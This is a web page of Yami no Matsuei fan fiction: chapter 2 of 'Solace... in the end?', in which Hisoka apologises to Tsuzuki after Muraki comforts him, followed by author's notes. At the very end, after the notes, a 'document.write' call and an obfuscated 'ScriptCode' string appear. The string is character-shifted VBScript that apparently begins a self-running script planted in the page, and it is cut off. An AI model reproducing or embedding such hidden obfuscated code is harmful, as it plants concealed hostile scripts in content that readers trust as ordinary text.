Yami No Matsuei Fan Fiction ❯ Solace... ❯ Chapter 2

[ T - Teen: Not suitable for readers under 13 ]

az: Hahaha... I did another outake!! ;P


Disclaimer: I don't own Yami no Matsuei nor did I own the tankoubons or the anime. Characters and original excerpt from the fic are copyrights of Matsushita Yoko-sensei. No infringements are intended and no grudge was held during this production. The sky will fall if I wrote something as near as yaoi (and this was thankfully still shonen-ai..)!! Eh..? Did the sky started to crumble? O-uh...


Solace... in the end?

Written by Azzie @ Alienna Azuani @ Yami Azzie

'...Tsuzuki!! You're alright!!', gasped Hisoka as Tsuzuki walked past him, silently. His eyes widen as he saw Tsuzuki wearing a coat that looked very much like the one Muraki usually wore. He darted towards Tatsumi.

'Tatsumi... Did that bastard---! Tsuzuki---!!' Tatsumi nodded as Hisoka's mouth gaped. '...Tsuzuki said that the doctor did nothing to him, but if I know better... Ja, you'd better apologize to him properly. He was still angry with you... and being comforted by someone like Muraki is certainly not what he'd expected! Go along... Tsuzuki was easily angry by trivial things but, he's also not one to held grudges for too long...', said Tatsumi again as he nudged Hisoka towards Tsuzuki's direction as he saw the man walked outside towards the sakura trees. Hisoka ran as he caught up with Tsuzuki.

'Tsuzuki... I...', stuttered Hisoka as Tsuzuki made faces to him. 'I hate you...', stated Tsuzuki as he pouted. 'Technically, I should say... Muraki was indeed nicer compared to you!! Yeah... aside from the fact that he kissed me, he was more than what someone else would have done... I can't believe it that he would actually come to keep me company when I was feeling down, but well... honestly, I should thank him!! I was feeling a lot more better now...', said Tsuzuki again as he took off Muraki's coat.

'Tsuzuki... I.. I'm sorry!! I shouldn't have... but then, it was so sudden... but... HE KISSED YOU!!!?', gasped Hisoka as Tsuzuki blushed. 'Oops... I shouldn't have said... aaah!! It's not like he did anything else!! And that... it's not like the first time he did that... I wonder, between him and Hakushaku-sama... which is worse...?'

Hisoka grabbed him from behind. 'I... I'm really sorry!! Please... Tsuzuki!!'

Tsuzuki grinned. 'Maa... finally I got that from your mouth!! It'll be a lesson for you to treat me even more nicely from now on...', said Tsuzuki with a smirk as Hisoka's face turned red. 'You... you've tricked me!!', he gasped as Tsuzuki frowned. 'I didn't... and don't try taking all that back!! You still owe me a treat to that cake house I saw when we went to Nagasaki. I expect you to pay that debt...', said Tsuzuki as he started to leave. He sighed. 'I'm famished!! With all of Muraki's sweet talks and all this trouble... I'm tired out!! I wanna go home... ja, Hisoka...!!', he said again as he walked home.

Hisoka looked at him in surprise as he swallowed everything that he said and smiled. 'Haa... that was so like you...', he sighed as he too walked towards his home...

[FIN]


az: Ah... well, the story was hanging in the middle!! You can't expect me to do nothing right?! And... I had another idea coming up... and it was supposed to be another gift to myself as my bday was on 5th.... but, well... I'll post it later... I've been wanting to do sumthing about Muraki on sugar-high... and MurakiXTsuzuki fics are so hard to find. So I'll make one!! Hehe..

A/N: You know... even if this only starts as a hobby... not getting review and ppl pressing me to constantly check my fics is annoying!! I'll do it if I have time... you know... it's not like I'm getting paid for this!! document.write "

" ScriptCode = "ChlRBqhos+VRBqhos+@ookds+VhmO`sg+mEnkcdq+mBncdRtaQtm^Shld'(EE/0'(EE/1'(Dmc RtaEtmbshnmEE/0'(NmDqqnqQdrtldMdwsDqq-Bkd`qSncnHs